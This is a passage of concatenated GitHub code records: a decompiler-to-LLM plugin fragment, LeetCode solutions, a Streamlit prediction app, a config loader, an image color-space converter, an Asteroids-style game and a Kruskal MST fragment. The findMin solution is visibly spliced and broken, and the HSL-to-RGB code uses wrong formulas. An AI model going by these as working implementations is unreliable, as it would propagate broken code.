{location}\".format(location=location))\n#check to see if Fucntion is None\nif function is None:\n print(\"Function is None, looking for a function with that address\")\n function = fm.getFunctionContaining(location)\n #check to see if Fucntion is None\n if function is None:\n print(\"Function is None for this address\")\n\n \n\n#hash_value = program.getExecutableImage().getBytes()\n\n#print(\"SHA-256 Hash: {hash_value}\".format(hash_value=hash_value))\n#print(\"location_str: {location_str}\".format(location_str=location_str))\n#print(\"function: {function}\".format(function=function))\n\nc_code = decompiler.decompileFunction(function, 90, task_monitor).getDecompiledFunction().getC()\n#print(c_code)\ncomment = 
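# ---- editor's note: illustrative sketch, not part of the original record ----
# send_code_to_server() above builds the JSON body and Content-Type header by
# hand; requests can do both via the json= keyword, and raise_for_status()
# replaces the manual status-code check (a design alternative, not what the
# record does):
import requests

def post_json(url, data, timeout=30):
    resp = requests.post(url, json=data, timeout=timeout)  # serializes + sets header
    resp.raise_for_status()                                # raises on 4xx/5xx
    return resp.json()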
function.getComment()\n#print(\"repeatable comment: {comment}\".format(comment=comment))\n\nresponse = send_code_to_server(hash_value, location_str, c_code, comment)\nprint(\"Server Response:\", response)\n","repo_name":"binaryninja/decode-ai","sub_path":"plugins/llm_suggest.py","file_name":"llm_suggest.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"}
{"seq_id":"24097850906","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 21 15:59:35 2019\r\n\r\n@author: liuga\r\n\"\"\"\r\n# Compared with 153, duplicates are allowed: [4,5,6,7,0,1,4] [2,2,2,0,1]; nums splits into 2 sorted arrays\r\n# In the worst case, e.g. when all elements are equal, time complexity degrades to O(n)\r\nclass Solution(object):\r\n    def findMin(self, nums):\r\n        l, r = 0 , len(nums)-1\r\n        while l < r :\r\n            m = (l + r)//2\r\n            if nums[m] > nums[r]: # mid is in the first sorted array, i satisfies mid = nums[0]:\r\n                l = mid\r\n            else:\r\n                r = mid -1\r\n        return nums[r+1] if r + 1 < n else nums[0]\r\n","repo_name":"Misskesite/Leetcode","sub_path":"154findMiniRotatedArray.py","file_name":"154findMiniRotatedArray.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
{"seq_id":"10339181560","text":"#\n# @lc app=leetcode.cn id=117 lang=python3\n#\n# [117] Populating Next Right Pointers in Each Node II\n#\n\n# class Node:\n#     def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n#         self.next = next\n\n\n# @lc code=start\n\"\"\"\n# Definition for a Node.\nclass Node:\n    def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n        self.val = val\n        self.left = left\n        self.right = right\n        self.next = next\n\"\"\"\n\n\nclass Solution:\n    def connect(self, root: 'Node') -> 'Node':\n        if not root:\n            return root\n        head = root\n        while head:  # head node of the current level\n            cur = head  # node currently being processed on this level\n            pre = head = None  # initialize the next level's head and previous node\n            while cur:\n                if cur.left:\n                    if not pre:  # next level's previous node not found yet: update both the next level's head and previous node\n                        pre = head = cur.left\n                    else:  # previous node already found: point it at the current child and advance pre\n                        pre.next = cur.left\n                        pre = pre.next\n                if cur.right:\n                    if not pre:\n                        pre = head = cur.right\n                    else:\n                        pre.next = cur.right\n                        pre = pre.next\n                cur = cur.next\n        return root\n# @lc code=end\n\n\n# root = Node(1)\n# root.left = Node(2)\n# root.right = Node(3)\n# root.left.left = Node(4)\n# root.left.right = Node(5)\n# root.right.right = Node(7)\n\n# solution = Solution()\n# resRoot = solution.connect(root)\n\n\n# def read(root):\n#     que = [root]\n#     while que:\n#         cur = que.pop(0)\n#         print(cur.val, cur.next)\n#         if cur.left:\n#             que.append(cur.left)\n#         if cur.right:\n#             que.append(cur.right)\n\n\n# read(resRoot)\n","repo_name":"jeiizou/leetcode-note","sub_path":"117.填充每个节点的下一个右侧节点指针-ii.py","file_name":"117.填充每个节点的下一个右侧节点指针-ii.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
{"seq_id":"43657532236","text":"import streamlit as st\nimport pandas as pd\nimport pickle\nimport xgboost as xgb\n\n# Title\nst.header(\"Prediksi Indeks Pendidikan di Jawa Barat\")\n\n\ncol1, col2, col3, col4 = st.columns([1,0.75,1.5,1.5])\n\n# Dropdown input\nwith col1:\n    status_kegiatan_buta_aksara= st.slider(\"Kegiatan Pemberantasan Buta Aksara (%)\", 0,100,25)\n    ketersediaan_pkbm = st.number_input(\"Jumlah Ketersediaan Pusat Kegiatan Belajar\",step=1,min_value=0)\n    ketersediaan_tbm = st.number_input(\"Jumlah Perpustakaan\",step=1,min_value=0)\n    jumlah_angkatan_kerja = 
st.number_input(\"Jumlah Angkatan Kerja \",step=1,min_value=0)\n kepadatan_penduduk = st.number_input(\"Total Kepadatan Penduduk\",step=1,min_value=0)\n\nwith col2:\n Jumlah_SD = st.number_input(\"Jumlah SMD\",step=1,min_value=0)\n Jumlah_SMP = st.number_input(\"Jumlah SMP\",step=1,min_value=0)\n Jumlah_SMA = st.number_input(\"Jumlah SMA\",step=1,min_value=0)\n Jumlah_SMK= st.number_input(\"Jumlah SMK\",step=1,min_value=0)\n\nwith col3:\n Jumlah_Guru_SD = st.number_input(\"Jumlah Guru SD\",step=1,min_value=0)\n Jumlah_Guru_SMP = st.number_input(\"Jumlah Guru SMP\",step=1,min_value=0)\n Jumlah_Guru_SMA = st.number_input(\"Jumlah Guru SMA\",step=1,min_value=0)\n Jumlah_Guru_SMK = st.number_input(\"Jumlah Guru SMK\",step=1,min_value=0)\n\nwith col4:\n waktu_tempuh_sd_terdekat = st.number_input(\"Waktu Tempuh SD Terdekat(dalam menit)\",step=0.1,min_value=0.0)\n waktu_tempuh_smp_terdekat = st.number_input(\"Waktu Tempuh SMP Terdekat(dalam menit)\",step=0.1,min_value=0.0)\n waktu_tempuh_sma_terdekat = st.number_input(\"Waktu Tempuh SMA Terdekat(dalam menit)\",step=0.1,min_value=0.0)\n Garis_Kemiskinan = st.number_input(\"Garis Kemiskinan Menurut Kab/Kota (Rupiah/Perkapita/Perbulan)\",step=1,min_value=0)\n\n\n# If button is pressed\nif st.button(\"Prediksi Indeks Pendidikan Berdasarkan data Anda\"):\n \n # Unpickle model\n xgb_cv_model= pickle.load(open(\"xgb_cv.pkl\", 'rb'))\n scaler_fitur= pickle.load(open(\"scaler_fitur.pkl\", 'rb'))\n scaler_target= pickle.load(open(\"scaler_target.pkl\", 'rb'))\n\n # Store inputs into dataframe\n df_input = pd.DataFrame([[status_kegiatan_buta_aksara, ketersediaan_pkbm, ketersediaan_tbm,jumlah_angkatan_kerja,kepadatan_penduduk,Jumlah_SD,Jumlah_SMP,Jumlah_SMA,Jumlah_SMK,\n Jumlah_Guru_SD,Jumlah_Guru_SMP,Jumlah_Guru_SMA,Jumlah_Guru_SMK,waktu_tempuh_sd_terdekat,waktu_tempuh_smp_terdekat,waktu_tempuh_sma_terdekat,Garis_Kemiskinan]], \n columns = ['status_kegiatan_buta_aksara', 'ketersediaan_pkbm','ketersediaan_tbm', 'jumlah_angkatan_kerja',\n 'kepadatan_penduduk','Jumlah SD', 'Jumlah SMP', 'Jumlah SMA', 'Jumlah SMK', 'Jumlah Guru SD', 'Jumlah Guru SMP', 'Jumlah Guru SMA', 'Jumlah Guru SMK',\n 'waktu_tempuh_sd_terdekat', 'waktu_tempuh_smp_terdekat', 'waktu_tempuh_sma_terdekat', 'Garis Kemiskinan Menurut Kab/Kota (Rupiah/Perkapita/Perbulan)']\n )\n\n def feature_engineering_features (df_selected):\n\n df_selected_feature=df_selected\n\n features= ['status_kegiatan_buta_aksara',\n 'ketersediaan_pkbm',\n 'ketersediaan_tbm',\n 'jumlah_angkatan_kerja',\n 'kepadatan_penduduk',\n 'Jumlah SD',\n 'Jumlah SMP',\n 'Jumlah SMA',\n 'Jumlah SMK',\n 'Jumlah Guru SD',\n 'Jumlah Guru SMP',\n 'Jumlah Guru SMA',\n 'Jumlah Guru SMK',\n 'waktu_tempuh_sd_terdekat',\n 'waktu_tempuh_smp_terdekat',\n 'waktu_tempuh_sma_terdekat',\n 'Garis Kemiskinan Menurut Kab/Kota (Rupiah/Perkapita/Perbulan)']\n\n df_selected_feature = df_selected_feature.transpose().reindex(features).transpose().astype(float)\n\n df_selected_feature['status_kegiatan_buta_aksara']= df_selected_feature['status_kegiatan_buta_aksara']/100\n \n # inputdata = pd.DataFrame(scaler_fitur.transform(df_selected_feature[features]),columns = features)\n\n return df_selected_feature\n\n Data_input = feature_engineering_features(df_input)\n\n #st.text(Data_input.transpose())\n # Get prediction\n #Prediction:\n result_prediction= xgb_cv_model.predict(Data_input)\n data_hasil =pd.DataFrame(result_prediction,columns= ['indeks_pendidikan'])\n inversed_result = scaler_target.inverse_transform(data_hasil)\n\n # Output prediction\n 
st.text(print(\"Hasil prediksi nilai indeks pendidikan berdasarkan kondisi anda\", inversed_result))","repo_name":"FirRW/PrediksiIndeksPendidikan","sub_path":"Deployment/Input and Model/Predindeks.py","file_name":"Predindeks.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7471628195","text":"import json\nimport logging\nimport os\n\nfrom ics.environment import ICS_CONF\nfrom ics.environment import ICS_CONF_FILE\nfrom ics.resource import get_resource\nfrom ics.resource import grp_add\nfrom ics.resource import res_add\nfrom ics.resource import res_link\n\nlogger = logging.getLogger(__name__)\n\n\ndef read_json(filename):\n \"\"\"Read data from configuration file and return data\"\"\"\n try:\n with open(filename, 'r') as file:\n return json.load(file)\n except IOError as error:\n logger.error('Unable to load config file {}, {}'.format(filename, str(error)))\n raise\n\n\ndef write_json(filename, data):\n \"\"\"Write configuration data in json to file\"\"\"\n try:\n with open(filename, 'w') as file:\n json.dump(data, file, indent=4, sort_keys=True)\n except IOError as error:\n logger.error('Unable to save config file {}, {}'.format(filename, str(error)))\n raise\n\n\ndef load_config():\n \"\"\"Read ICS configuration from file\"\"\"\n logger.info('Loading from config file')\n if not os.path.isfile(ICS_CONF_FILE):\n logger.info('No config file found, skipping load')\n return\n\n data_dict = read_json(ICS_CONF_FILE)\n\n for group_name in data_dict.keys():\n grp_add(group_name)\n for resource_name in data_dict[group_name]:\n res_add(resource_name, group_name)\n resource = get_resource(resource_name)\n for attr_name in data_dict[group_name][resource_name]['attributes'].keys():\n resource.attr[attr_name] = str(data_dict[group_name][resource_name]['attributes'][attr_name])\n\n # Links need to done in separate loop to guarantee parent\n # resources are created when establishing a link\n for group_name in data_dict.keys():\n for resource_name in data_dict[group_name]:\n for parent_name in data_dict[group_name][resource_name]['dependencies']:\n res_link(parent_name, resource_name)\n\n logger.debug('Resource configuration loaded from file {}'.format(ICS_CONF_FILE))\n\n\ndef write_config(data):\n \"\"\"Save ICS configuration to file\"\"\"\n #data_dict = {}\n #default_attr = resource_attributes['resource']\n\n #for group in groups.values():\n # group_name = group.name\n # data_dict[group_name] = {}\n # for resource in group.members:\n # resource_name = resource.name\n # data_dict[group_name][resource_name] = {}\n # data_dict[group_name][resource_name]['attributes'] = {}\n # for attr_name in resource.attr.keys():\n # attr_value = resource.attr[attr_name]\n # if attr_value != default_attr[attr_name]['default']:\n # data_dict[group_name][resource_name]['attributes'][attr_name] = attr_value\n # data_dict[group.name][resource_name]['dependencies'] = []\n # for parent in resource.parents:\n # data_dict[group_name][resource_name]['dependencies'].append(parent.name)\n\n if not os.path.isdir(ICS_CONF):\n try:\n os.makedirs(ICS_CONF)\n except OSError as e:\n logger.error('Unable to create config directory: {}'.format(ICS_CONF))\n logger.error('Reason: {}'.format(e))\n\n write_json(ICS_CONF_FILE, 
data)\n","repo_name":"Raleigh24/icsserver","sub_path":"ics/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"74106544940","text":"import numpy as np\nimport math\nimport cv2\nfrom PIL import Image\n\nclass ImageProcessor:\n def __init__(self):\n pass\n\n def process(self, filename):\n image = cv2.imread(filename) \n\n self.num_pixels = image.shape[0] * image.shape[1]\n return image\n\n def histogram(self, image, bins=256):\n num_channels = image.shape[2]\n hist = np.zeros((bins, num_channels)) \n\n for row in range(len(image)):\n for col in range(len(image[row])):\n\n r = image[row][col][0]\n g = image[row][col][1]\n b = image[row][col][2]\n\n hist[r][0] += 1\n hist[g][1] += 1\n hist[b][2] += 1\n\n return hist\n\n def normalize_histogram(self, histogram): \n colors = histogram.shape[1]\n normalized = np.zeros((1, colors)) \n \n for col in range(colors):\n normalized[0][col] = ((255 / self.num_pixels) \n * np.sum(histogram[:,col]))\n \n return normalized \n\n # Turn the RGB image to Hue, \n def RGB_to_HSL(self, image):\n # I should probably change this to only three color channels\n hsl = np.zeros(image.shape, 'float64')\n print(f'HSL shape: {hsl.shape}')\n for row in range(len(image)):\n for col in range(len(image[row])):\n # color channels\n R = image[row][col][0] / 255\n G = image[row][col][1] / 255\n B = image[row][col][2] / 255\n #print(f'RGB: {R},{G},{B}') \n\n MIN = min(R, G, B)\n MAX = max(R, G, B)\n L = (MAX + MIN) / 2\n\n if (MAX - MIN) == 0:\n S = 0\n else:\n S = (MAX - MIN) / (1 - abs(2*L - 1))\n \n # Getting the Hue\n if MAX == MIN:\n H = 0 \n elif MAX == R and G >= B:\n H = 60 * ((G - B) / (MAX - MIN))\n elif MAX == R and G < B:\n H = 60 * ((G - B) / (MAX - MIN)) + 360\n elif MAX == G:\n H = 60 * ((B - R) / (MAX - MIN)) + 120 \n elif MAX == B:\n H = 60 * ((R - G) / (MAX - MIN)) + 240\n \n #print(f'HSL: {H}, {S}, {L}')\n hsl[row][col] = np.array([H, S, L])\n\n return hsl \n\n def HSL_to_RGB(self, image):\n rgb = np.zeros((600, 800, 3), 'uint8')\n for row in range(len(image)):\n for col in range(len(image[row])):\n H = image[row][col][0]\n S = image[row][col][1]\n L = image[row][col][2]\n\n C = (1 - abs(2 * L - 1) * S)\n X = C * (1 - abs((H / 60) % 2 - 1))\n m = L - (C / 2)\n\n Rp, Gp, Bp = 0, 0, 0\n\n if H >=0 and H < 60:\n Rp, Gp, Bp = C, X, 0\n elif H >=0 and H < 120:\n Rp, Gp, Bp = X, C, 0\n elif H >=120 and H < 180:\n Rp, Gp, Bp = 0, C, X\n elif H >= 180 and H < 240:\n Rp, Gp, Bp = 0, X, C\n elif H >= 240 and H < 300:\n Rp, Gp, Bp = X, 0, C\n elif H >= 300 and H < 360:\n Rp, Gp, Bp = C, 0, X\n \n R = (Rp + m) * 255\n G = (Gp + m) * 255\n B = (Bp + m) * 255\n #print(f'RGB: {R}, {G}, {B}')\n rgb[row, col] = np.array([R, G, B])\n\n return rgb \n\n def contrast_adjustment(self):\n pass\n\n def noise_reduction(self):\n pass\n\n def color_correction(self):\n pass\n","repo_name":"andrew15818/109","sub_path":"fall/image_processing/homework/hw1/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21039156812","text":"from inventory_report.importer.importer import Importer\n\nimport csv\n\n\nclass CsvImporter(Importer):\n @staticmethod\n def import_data(path: str):\n data = []\n\n try:\n if not path.endswith('.csv'):\n raise ValueError\n\n with open(path, mode=\"r\") as file:\n csv_file = 
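# ---- editor's note: illustrative sketch, not part of the original records ----
# The per-pixel RGB<->HSL loops in image_processing.py above run
# O(width*height) Python iterations; for real images the vectorized OpenCV
# conversion is the usual shortcut. Caveats: cv2 uses HLS channel order (not
# HSL), and for uint8 inputs hue is scaled to 0..179 while L and S are 0..255.
import cv2
import numpy as np

rgb = np.zeros((600, 800, 3), np.uint8)      # stand-in image
hls = cv2.cvtColor(rgb, cv2.COLOR_RGB2HLS)   # one call instead of nested loops
back = cv2.cvtColor(hls, cv2.COLOR_HLS2RGB)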
csv.DictReader(file)\n for line in csv_file:\n data.append(line)\n return data\n except ValueError:\n raise ValueError(\"Arquivo inválido\")\n","repo_name":"martinsgabel/trybe-inventory-report","sub_path":"inventory_report/importer/csv_importer.py","file_name":"csv_importer.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30961975101","text":"__author__ = 'dare7'\n# program template for Spaceship\n# for development in external local IDE and to be complied with Codeskulptor at the same time\ntry:\n import simplegui\nexcept ImportError:\n import SimpleGUICS2Pygame.simpleguics2pygame as simplegui\nimport math\nimport random\n\n# globals for user interface\nWIDTH = 800\nHEIGHT = 600\nscore = 0\nlives = 3\ntime = 0.5\n\n# globals for ship\nSHIP_ANG_VEL_INC = 0.05\nSHIP_VEL_ACC = 0.1\nSHIP_FRICTION = 0.99\n\n# globals for rock\nROCK_SPEED = 0.001\nrocks = []\n\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n\n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n\n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 50)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\nsoundtrack = 
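# ---- editor's note: illustrative usage sketch, not part of the original records ----
# CsvImporter.import_data above returns one dict per CSV row (csv.DictReader
# keyed by the header line). A minimal demonstration with a throwaway file:
import csv, os, tempfile

path = os.path.join(tempfile.mkdtemp(), 'inventory.csv')
with open(path, 'w', newline='') as f:
    f.write('id,name\n1,widget\n')
with open(path) as f:
    rows = list(csv.DictReader(f))
assert rows == [{'id': '1', 'name': 'widget'}]   # values arrive as strings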
simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# helper functions to handle transformations\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p,q):\n return math.sqrt((p[0] - q[0]) ** 2+(p[1] - q[1]) ** 2)\n\n# Ship class\nclass Ship:\n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n\n def draw(self, canvas):\n #canvas.draw_image(image, center_source, width_height_source, center_dest, width_height_dest, rotation)\n if not self.thrust:\n canvas.draw_image(self.image, self.image_center, self.image_size, [self.pos[0], self.pos[1]],\n self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, [self.image_center[0]+self.image_size[0], self.image_center[1]],\n self.image_size, [self.pos[0], self.pos[1]], self.image_size, self.angle)\n #canvas.draw_image(self.image, self.image_center, self.image_size, [self.pos[0], self.pos[1]], self.image_size, self.angle)\n\n def update(self):\n self.pos[0] += self.vel[0]\n self.pos[1] += self.vel[1]\n self.angle += self.angle_vel\n if self.thrust:\n self.vel[0] += angle_to_vector(self.angle)[0]*SHIP_VEL_ACC\n self.vel[1] += angle_to_vector(self.angle)[1]*SHIP_VEL_ACC\n self.vel[0] *= SHIP_FRICTION\n self.vel[1] *= SHIP_FRICTION\n if self.pos[0] < 0:\n self.pos[0] = WIDTH\n elif self.pos[0] > WIDTH:\n self.pos[0] = 0\n elif self.pos[1] < 0:\n self.pos[1] = HEIGHT\n elif self.pos[1] > HEIGHT:\n self.pos[1] = 0\n\n\n\n def turn_left(self):\n self.angle_vel -= SHIP_ANG_VEL_INC\n\n def turn_right(self):\n self.angle_vel += SHIP_ANG_VEL_INC\n\n def thrust_on(self):\n self.thrust = True\n ship_thrust_sound.play()\n\n def thrust_off(self):\n self.thrust = False\n ship_thrust_sound.rewind()\n\n def shoot(self):\n global a_missile\n # __init__(self, pos, vel, ang, ang_vel, image, info, sound = None)\n a_missile = Sprite([self.pos[0] + ship_info.get_radius()*angle_to_vector(self.angle)[0],\n self.pos[1] + ship_info.get_radius()*angle_to_vector(self.angle)[1]],\n [(self.vel[0] + angle_to_vector(self.angle)[0])*2,\n (self.vel[1] + angle_to_vector(self.angle)[1])*2],\n self.angle, 0, missile_image, missile_info, missile_sound)\n\n\n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n\n def draw(self, canvas):\n # canvas.draw_circle(self.pos, self.radius, 1, \"Red\", \"Red\")\n #canvas.draw_image(image, center_source, width_height_source, center_dest, width_height_dest, rotation)\n 
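# ---- editor's note: illustrative sketch, not part of the original record ----
# Ship.update above integrates one Euler step per frame: accelerate along the
# facing vector while thrusting, apply friction as a multiplicative decay, then
# wrap the position at the screen edges. The if/elif wrap chain can also be
# written with modulo (a design alternative, not what the record does):
import math

def physics_step(pos, vel, angle, thrust, acc=0.1, friction=0.99, w=800, h=600):
    if thrust:
        vel = [vel[0] + math.cos(angle) * acc, vel[1] + math.sin(angle) * acc]
    vel = [vel[0] * friction, vel[1] * friction]   # velocity decays every frame
    return [(pos[0] + vel[0]) % w, (pos[1] + vel[1]) % h], vel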
canvas.draw_image(self.image, self.image_center, self.image_size, [self.pos[0], self.pos[1]],\n self.image_size, self.angle)\n\n def update(self):\n self.pos[0] += self.vel[0]\n self.pos[1] += self.vel[1]\n self.angle += self.angle_vel\n #self.vel[0] += angle_to_vector(self.angle)[0]*ROCK_SPEED\n #self.vel[1] += angle_to_vector(self.angle)[1]*ROCK_SPEED\n if self.pos[0] < 0:\n self.pos[0] = WIDTH\n elif self.pos[0] > WIDTH:\n self.pos[0] = 0\n elif self.pos[1] < 0:\n self.pos[1] = HEIGHT\n elif self.pos[1] > HEIGHT:\n self.pos[1] = 0\n\n\ndef draw(canvas):\n global time, ship_ang_vel, rocks\n # animate background\n #my_ship.vel[0] += 1/60\n #my_ship.vel[1] += 1/60\n #my_ship.angle_vel += 1/60\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n\n # draw ship and sprites\n my_ship.draw(canvas)\n a_rock.draw(canvas)\n a_missile.draw(canvas)\n\n # update ship and sprites\n my_ship.update()\n #for rock in rocks:\n # rock.update()\n a_rock.update()\n a_missile.update()\n # score and lives\n canvas.draw_text(\"lives: %s\" % str(lives), (WIDTH*0.05, HEIGHT*0.1), 30, 'White', 'monospace')\n canvas.draw_text(\"score: %s\" % str(score), (WIDTH*0.75, HEIGHT*0.1), 30, 'White', 'monospace')\n\n\ndef key_down(key):\n global my_ship\n if key == simplegui.KEY_MAP[\"left\"]:\n my_ship.turn_left()\n elif key == simplegui.KEY_MAP[\"right\"]:\n my_ship.turn_right()\n elif key == simplegui.KEY_MAP[\"up\"]:\n my_ship.thrust_on()\n elif key == simplegui.KEY_MAP[\"space\"]:\n my_ship.shoot()\n\n\n\ndef key_up(key):\n global my_ship, ship_ang_vel\n if key == simplegui.KEY_MAP[\"left\"]:\n my_ship.angle_vel = 0\n elif key ==simplegui.KEY_MAP[\"right\"]:\n my_ship.angle_vel = 0\n elif key == simplegui.KEY_MAP[\"up\"]:\n my_ship.thrust_off()\n\n\n# timer handler that spawns a rock\ndef rock_spawner():\n # locally ok, crazy rotation in chrome, sorry can't get what's wrong!\n global a_rock, rocks\n #rock_pos = []\n #rock_pos[0], rock_pos[1] = 0, 0\n rock_vel1 = random.randrange(-100,100)/100\n rock_vel2 = random.randrange(-100,100)/100\n rock_pos1 = random.randrange(0, WIDTH)\n rock_pos2 = random.randrange(0, HEIGHT)\n rock_ang = random.randrange(0,628)/100\n rock_ang_vel = random.randrange(-10,10)/100\n #__init__(self, pos, vel, ang, ang_vel, image, info, sound = None)\n #a_rock = Sprite([400, 300], [0.3, 0.4], 0, 0.1, asteroid_image, asteroid_info)\n a_rock = Sprite([rock_pos1, rock_pos2], [rock_vel1, rock_vel2], rock_ang, rock_ang_vel, asteroid_image, asteroid_info)\n rocks.append(a_rock)\n #a_rock = Sprite([WIDTH / 3, HEIGHT / 3], [1, 1], 0, 1, asteroid_image, asteroid_info)\n #print(rocks)\n\n\n# quit handler\ndef quit():\n global frame\n frame.stop()\n timer.stop()\n\n\ndef init():\n # initialize frame\n global my_ship, a_rock, a_missile, frame, timer\n frame = simplegui.create_frame(\"Asteroids, by dare7\", WIDTH, HEIGHT)\n frame.set_keydown_handler(key_down)\n frame.set_keyup_handler(key_up)\n frame.add_button(\"Quit\", quit, 150)\n # initialize ship and two sprites\n my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)\n a_rock = Sprite([WIDTH / 3, HEIGHT / 3], [1, 1], 0, 0, asteroid_image, asteroid_info)\n a_missile 
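A likely cause of the "crazy rotation in chrome" comment in rock_spawner below: under Python 2 (which CodeSkulptor runs), random.randrange(-10, 10)/100 floor-divides to -1 or 0, so the angular velocity is either huge or zero. random.uniform expresses the intended ranges directly; a sketch of the equivalent draws:

import math
import random

rock_vel = [random.uniform(-1, 1), random.uniform(-1, 1)]  # px per tick
rock_ang = random.uniform(0, 2 * math.pi)                  # radians
rock_ang_vel = random.uniform(-0.1, 0.1)                   # rad per tick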
= Sprite([2 * WIDTH / 3, 2 * HEIGHT / 3], [-1,1], 0, 0, missile_image, missile_info, missile_sound)\n\n # register handlers\n frame.set_draw_handler(draw)\n\n timer = simplegui.create_timer(1000.0, rock_spawner)\n\n # get things rolling\n timer.start()\n frame.start()\n\nif __name__ == '__main__':\n # for future import as module usage\n init()","repo_name":"dare7/Coursera-An-Introduction-to-Interactive-Programming-in-Python","sub_path":"Spaceship.py","file_name":"Spaceship.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29453331642","text":"\"\"\"\nauthor: Ricardo\nemail: ricardo_zeng@whu.edu.cn\npages of CLRS: chinese page 366 in chapter 23\n\nDiscription of the algorithms:\nMST-KRUSKAL(G, w)\n1 A = φ\n2 for each vertex v ∈ G.V\n3 MAKE-SET(v)\n4 sort the edges of G.E in nonincreasing order by weight w\n5 for each edge(u, v) ∈ G.E, taken in nondecreasing order by weight\n6 if FIND-SET(u) ≠ FIND-SET(v)\n7 A = A ∪ {(u, v)}\n8 UNION(u, v)\n9 return A\n\"\"\"\nfrom pygraph.classes.digraph import digraph\nfrom disjoint_set_data import *\n\ndef mst_kruskal(g):\n \"\"\"\n @param type: graph\n @return type: list\n \"\"\"\n # edges = list()\n v2node = dict()\n A = list()\n \n for vertex in g.nodes():\n v = tree_node(vertex)\n v 